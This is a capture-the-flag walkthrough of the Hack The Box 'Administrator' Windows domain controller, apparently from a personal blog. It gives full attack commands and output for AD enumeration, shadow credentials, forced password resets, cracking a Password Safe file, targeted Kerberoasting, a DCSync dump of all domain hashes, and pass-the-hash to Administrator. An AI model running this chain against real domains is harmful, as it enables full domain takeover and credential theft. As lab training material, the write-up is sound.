
Hack the Box - Administrator

Walkthrough for the "Administrator" Hack the Box Challenge

Enumeration

First, as always, I edit the hosts file so that I don’t have to remember the IP of the room.

bash – Lukas Blog - Time for some coffee

┌─[root@htb-9c36twul9w][/home/nobrac]
└──╼ #cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	debian12-parrot

10.129.134.50 administrator.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-9c36twul9w htb-9c36twul9w.htb-cloud.com

NMAP Scan

I then perform an NMAP scan.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ nmap administrator.htb -vv -sV -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-17 07:10 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
Initiating Ping Scan at 07:10
Scanning administrator.htb (10.129.134.50) [4 ports]
Completed Ping Scan at 07:10, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:10
Scanning administrator.htb (10.129.134.50) [1000 ports]
Discovered open port 135/tcp on 10.129.134.50
Discovered open port 21/tcp on 10.129.134.50
Discovered open port 445/tcp on 10.129.134.50
Discovered open port 139/tcp on 10.129.134.50
Discovered open port 53/tcp on 10.129.134.50
Discovered open port 389/tcp on 10.129.134.50
Discovered open port 3268/tcp on 10.129.134.50
Discovered open port 88/tcp on 10.129.134.50
Discovered open port 593/tcp on 10.129.134.50
Discovered open port 636/tcp on 10.129.134.50
Discovered open port 3269/tcp on 10.129.134.50
Discovered open port 464/tcp on 10.129.134.50
Completed SYN Stealth Scan at 07:10, 0.18s elapsed (1000 total ports)
Initiating Service scan at 07:10
Scanning 12 services on administrator.htb (10.129.134.50)
Completed Service scan at 07:10, 6.47s elapsed (12 services on 1 host)
NSE: Script scanning 10.129.134.50.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 8.39s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.31s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
Nmap scan report for administrator.htb (10.129.134.50)
Host is up, received echo-reply ttl 127 (0.0092s latency).
Scanned at 2024-11-17 07:10:24 CST for 16s
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       REASON          VERSION
21/tcp   open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-11-17 20:10:32Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m01s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59010/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 59764/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 14437/udp): CLEAN (Timeout)
|   Check 4 (port 48871/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-11-17T20:10:34
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.71 seconds
           Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.076KB)

Hack The Box provides credentials for this machine in advance: the user is “olivia” and the corresponding password is “ichliebedich”.

I then used these credentials to gather information with Netexec, first over SMB and then over WinRM.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ netexec smb administrator.htb -u Olivia -p 'ichliebedich' --shares
SMB         10.129.134.50   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.134.50   445    DC               [+] administrator.htb\Olivia:ichliebedich
SMB         10.129.134.50   445    DC               [*] Enumerated shares
SMB         10.129.134.50   445    DC               Share           Permissions     Remark
SMB         10.129.134.50   445    DC               -----           -----------     ------
SMB         10.129.134.50   445    DC               ADMIN$                          Remote Admin
SMB         10.129.134.50   445    DC               C$                              Default share
SMB         10.129.134.50   445    DC               IPC$            READ            Remote IPC
SMB         10.129.134.50   445    DC               NETLOGON        READ            Logon server share
SMB         10.129.134.50   445    DC               SYSVOL          READ            Logon server share

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ netexec winrm administrator.htb -u olivia -p ichliebedich
WINRM       10.129.134.50   5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.134.50   5985   DC               [+] administrator.htb\olivia:ichliebedich (Pwn3d!)

Then I displayed the users within the domain.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~/.nxc/logs]
└──╼ []$ rpcclient -U "Olivia%ichliebedich" administrator.htb -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[olivia] rid:[0x454]
user:[michael] rid:[0x455]
user:[benjamin] rid:[0x456]
user:[emily] rid:[0x458]
user:[ethan] rid:[0x459]
user:[alexander] rid:[0xe11]
user:[emma] rid:[0xe12]

Bloodhound

Netexec has a built-in BloodHound collector. We use it to collect the domain data for further enumeration in BloodHound.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ netexec ldap 10.129.134.50 -u olivia -p ichliebedich --bloodhound --collection All --dns-server 10.129.134.50
SMB         10.129.134.50   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
LDAP        10.129.134.50   389    DC               [+] administrator.htb\olivia:ichliebedich
LDAP        10.129.134.50   389    DC               Resolved collection methods: container, objectprops, localadmin, acl, rdp, trusts, psremote, dcom, session, group
LDAP        10.129.134.50   389    DC               Done in 00M 02S
LDAP        10.129.134.50   389    DC               Compressing output into /home/nobrac/.nxc/logs/DC_10.129.134.50_2024-11-17_072900_bloodhound.zip

Then I started the neo4j database and BloodHound. I will not describe this in detail here, as there are enough instructions on the net and on the projects’ own GitHub pages. I then simply imported the ZIP file that I had previously generated with Netexec.

We see that the user “olivia” has the “GenericAll” permission on the user “michael” under “First Degree Object Control”. We can take advantage of this.

I then use the “pyWhisker” tool to write a KeyCredential into the “msDS-KeyCredentialLink” attribute of the user “michael” (shadow credentials) so that we can then change his password. Strictly speaking, the password change that follows is authorised by the GenericAll right on its own; the KeyCredential would additionally allow a PKINIT logon as “michael” with the saved PFX, without touching his password, as the tool output notes.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~/.nxc/logs/pywhisker]
└──╼ []$ pywhisker -d "administrator.htb" -u "olivia" -p 'ichliebedich' --target "michael" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Michael Williams,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 3c36ecb6-19db-1f01-aa9b-2e6a933eaba1
[*] Updating the msDS-KeyCredentialLink attribute of michael
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: We3AsZtq.pfx
[*] Must be used with password: K8dmwhwNaDKidqZ9SFsr
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

Log in with Evil-WinRM as “olivia” and change the password of the user “michael”.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ evil-winrm -i administrator.htb -u olivia -p ichliebedich
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael Anfang2022! /DOMAIN
The command completed successfully.

In BloodHound we can now see that the user “michael” has the “ForceChangePassword” permission on the user “benjamin”, so we can set a new password for him without knowing the old one.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ net rpc password benjamin Anfang2022! -U administrator.htb/michael%Anfang2022! -S administrator.htb

A WinRM login as the user “benjamin” was not possible. However, the Nmap scan at the beginning showed that port 21 (FTP) is open. Logging in there as “olivia” had failed, but as “benjamin” it now succeeded, and there I found a Password Safe database file.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ ftp administrator.htb
Connected to administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:root): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||53192|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||53194|)
125 Data connection already open; Transfer starting.
100% |***********************************|   952       98.02 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (96.83 KiB/s)

I use the “pwsafe2john” tool to extract the hash of the file into “pwsafe.hash” and then crack it with “john” using the “rockyou.txt” wordlist.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ pwsafe2john Backup.psafe3 > pwsafe.hash
└──╼ []$ john --wordlist=/usr/share/wordlists/rockyou.txt pwsafe.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:00 DONE (2024-11-17 08:22) 4.761g/s 39009p/s 39009c/s 39009C/s newzealand..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Then install Password Safe (https://pwsafe.org/) so that we can open the file with the cracked master password.

Inside it we find further credentials for the domain.

In BloodHound we then see that the user “emily” has the “GenericWrite” permission on the user “ethan”.

I then use the “pyWhisker” tool again.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ pywhisker -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --target ethan --action "add"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 2809de27-3c2b-53d3-7f6c-f53f5f6f7dc2
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: EFMTLOlW.pfx
[*] Must be used with password: UJqsstyDLQCzUFIwWx9P
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

After using “pyWhisker”, I wanted to use the “targetedKerberoast” tool to obtain a Kerberos TGS hash for the user “ethan” (emily’s GenericWrite right allows setting a temporary SPN on “ethan”, which makes him Kerberoastable). However, I kept getting the following error message.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~/targetedKerberoast]
└──╼ []$ python targetedKerberoast.py -v -d 'administrator.htb' -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Traceback (most recent call last):
  File "/home/nobrac/targetedKerberoast/targetedKerberoast.py", line 593, in main
    tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName=userName, password=args.auth_password, domain=args.auth_domain, lmhash=None, nthash=auth_nt_hash,
                                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket/krb5/kerberosv5.py", line 323, in getKerberosTGT
    tgt = sendReceive(encoder.encode(asReq), domain, kdcHost)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket/krb5/kerberosv5.py", line 93, in sendReceive
    raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

KRB_AP_ERR_SKEW means that the clock difference between my machine and the domain controller exceeds what Kerberos tolerates (5 minutes by default; the Nmap host scripts had already reported a clock-skew of 7h00m01s). I used the “rdate” tool to set my clock from the target VM, using it as the time server.
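The same skew can be read off the Nmap output before any Kerberos request is sent. The following Python is an added example and not part of the original walkthrough; it assumes the two Nmap lines quoted from the scan above (the scanner’s “Scanned at” local time and the KDC’s “server time”) and a small constructed zone table for the abbreviation Nmap prints.

```python
import re
from datetime import datetime, timedelta, timezone

# The KDC rejects requests whose timestamp differs from its own clock by more
# than the "maximum tolerance for computer clock synchronization" policy,
# which is 5 minutes by default on Windows. Anything beyond that produces
# KRB_AP_ERR_SKEW, exactly the error targetedKerberoast ran into.
MAX_SKEW = timedelta(minutes=5)

# Minimal zone table for the abbreviation Nmap prints next to "Scanned at".
# This is a constructed lookup for the example; extend it for your own zone.
ZONE_OFFSET_HOURS = {"UTC": 0, "CST": -6, "CDT": -5, "CET": 1, "CEST": 2}

# Constructed sample: the two relevant lines copied from the Nmap scan above.
NMAP_OUTPUT = """\
Scanned at 2024-11-17 07:10:24 CST for 16s
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-11-17 20:10:32Z)
"""

SCANNED_AT_RE = re.compile(r"Scanned at (\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) ([A-Z]+)")
SERVER_TIME_RE = re.compile(r"server time: (\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)Z")

def parse_nmap_clocks(text):
    """Return (scanner_time, kdc_time) as timezone-aware UTC datetimes."""
    local = SCANNED_AT_RE.search(text)
    kdc = SERVER_TIME_RE.search(text)
    if local is None or kdc is None:
        raise ValueError("need both a 'Scanned at' line and a kerberos-sec 'server time'")
    zone = timezone(timedelta(hours=ZONE_OFFSET_HOURS[local.group(2)]))
    scanner = datetime.strptime(local.group(1), "%Y-%m-%d %H:%M:%S").replace(tzinfo=zone)
    kdc_time = datetime.strptime(kdc.group(1), "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    return scanner.astimezone(timezone.utc), kdc_time

def kerberos_skew(text):
    """Signed skew (KDC clock minus scanner clock) and whether the KDC would reject us."""
    scanner, kdc_time = parse_nmap_clocks(text)
    skew = kdc_time - scanner
    return skew, abs(skew) > MAX_SKEW

if __name__ == "__main__":
    skew, too_large = kerberos_skew(NMAP_OUTPUT)
    print(f"skew {skew}, Kerberos authentication will {'fail' if too_large else 'work'}")
```

For the scan above this yields a skew of 7h00m08s, consistent with the host script’s 7h00m01s; a domain controller that is hours off its peers is itself a finding, since every Kerberos client in the domain inherits the problem.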

┌─[][root@htb-9c36twul9w][/home/nobrac]
└──╼ #rdate -n 10.129.134.50
Sun Nov 17 15:41:34 CST 2024

After this, it worked.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~/targetedKerberoast]
└──╼ []$ python targetedKerberoast.py -v -d 'administrator.htb' -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$f6a8c4fc077ea365f771c427ca47a260$[...]
[VERBOSE] SPN removed successfully for (ethan)

I saved the hash to “ethan.hash” and cracked it again with “john” and the “rockyou.txt” wordlist.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~/targetedKerberoast]
└──╼ []$ john --wordlist=/usr/share/wordlists/rockyou.txt ethan.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit       (?)     
1g 0:00:00:00 DONE (2024-11-17 15:44) 50.00g/s 256000p/s 256000c/s 256000C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Test the login with netexec and the cracked credentials.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~/targetedKerberoast]
└──╼ []$ netexec smb administrator.htb -u ethan -p limpbizkit
SMB         10.129.134.50   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.134.50   445    DC               [+] administrator.htb\ethan:limpbizkit

In BloodHound we can see that the user “ethan” has “DCSync” rights on the domain.

Use impacket’s “secretsdump” to replicate all domain secrets via DCSync (DRSUAPI). The RemoteOperations error at the start can be ignored here, because the DRSUAPI replication that follows does not need it.

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ impacket-secretsdump administrator.htb/ethan:limpbizkit@administrator.htb
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:f60d4512e66a84cd00127a50a1d26c79:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:f60d4512e66a84cd00127a50a1d26c79:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:b7c39960c41454fc13efb89049566ed59272e8fc961e85cfbde796209e667e63
administrator.htb\michael:aes128-cts-hmac-sha1-96:ba6db71728dfb70d432389892d109a41
administrator.htb\michael:des-cbc-md5:fdef4c259132f264
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:b4b68260a6c909d38751e0dec33eb9ecdda468717260e15500b797da597b912f
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:a287285e7e2f400f14123f4020d29db0
administrator.htb\benjamin:des-cbc-md5:bffd088fd3d6c797
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
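A dump like the one above is also what a defender audits: identical NT hashes mean shared passwords (in the dump above “michael” and “benjamin” share one, because both were just set to Anfang2022!), and the well-known empty-password NT hash is the one “Guest” shows. The following Python is an added example, not part of the original walkthrough; it parses the secretsdump line format and runs those checks over a constructed sample whose hash values are made up.

```python
import re
from collections import defaultdict

# NT hash of the empty string: an account carrying it has no password set.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM hash of the empty string: what every account shows when LM storage is disabled.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# One NTDS line per account as secretsdump prints it: [domain\]user:rid:lmhash:nthash:::
NTDS_LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Constructed sample in the secretsdump format above. The hash values are made
# up for this example and do not correspond to any real password.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
example.htb\\michael:1109:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
example.htb\\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
example.htb\\legacy:1120:0102030405060708090a0b0c0d0e0f10:00112233445566778899aabbccddeeff:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
"""

def parse_ntds_dump(text):
    """Return the NTDS credential lines as dicts; Kerberos-key and status lines are skipped."""
    accounts = []
    for line in text.splitlines():
        m = NTDS_LINE_RE.match(line.strip())
        if m:
            accounts.append(m.groupdict())
    return accounts

def audit_ntds_dump(text):
    """Flag empty passwords, legacy LM hashes and passwords shared between accounts."""
    accounts = parse_ntds_dump(text)
    users_by_nt = defaultdict(list)
    for acct in accounts:
        users_by_nt[acct["nt"]].append(acct["user"])
    return {
        "empty_password": sorted(a["user"] for a in accounts if a["nt"] == EMPTY_NT_HASH),
        "lm_hash_stored": sorted(a["user"] for a in accounts if a["lm"] != EMPTY_LM_HASH),
        # Same NT hash means the same password; the empty hash is its own finding above.
        "shared_password": {h: sorted(u) for h, u in users_by_nt.items()
                            if len(u) > 1 and h != EMPTY_NT_HASH},
    }

if __name__ == "__main__":
    for finding, hits in audit_ntds_dump(SAMPLE_DUMP).items():
        print(f"{finding}: {hits}")
```

Run over the real output above, the shared-password check lists michael and benjamin; on a production NTDS export the same checks find password reuse between service and admin accounts without ever cracking anything.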

Log in via WinRM with the Administrator’s NT hash (pass-the-hash).

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ evil-winrm -i administrator.htb -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        11/17/2024  12:03 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
383f762dbf31a12f114d632de874efc5

The user flag can be found on the desktop of the user “emily”.

*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        10/22/2024  11:46 AM                Administrator
d-----        10/30/2024   2:25 PM                emily
d-----        11/17/2024   1:03 PM                michael
d-----        11/17/2024   1:02 PM                olivia
d-r---         10/4/2024  10:08 AM                Public


*Evil-WinRM* PS C:\Users> cd emily
*Evil-WinRM* PS C:\Users\emily> cd Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> ls


    Directory: C:\Users\emily\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2024   2:23 PM           2308 Microsoft Edge.lnk
-ar---        11/17/2024  12:03 PM             34 user.txt


*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
ad11aeaef4b06af8452244f7c218f352

That’s it for the room.

Licensed under CC BY-NC-SA 4.0
Last updated on Nov 19, 2024 00:00 UTC
Servus.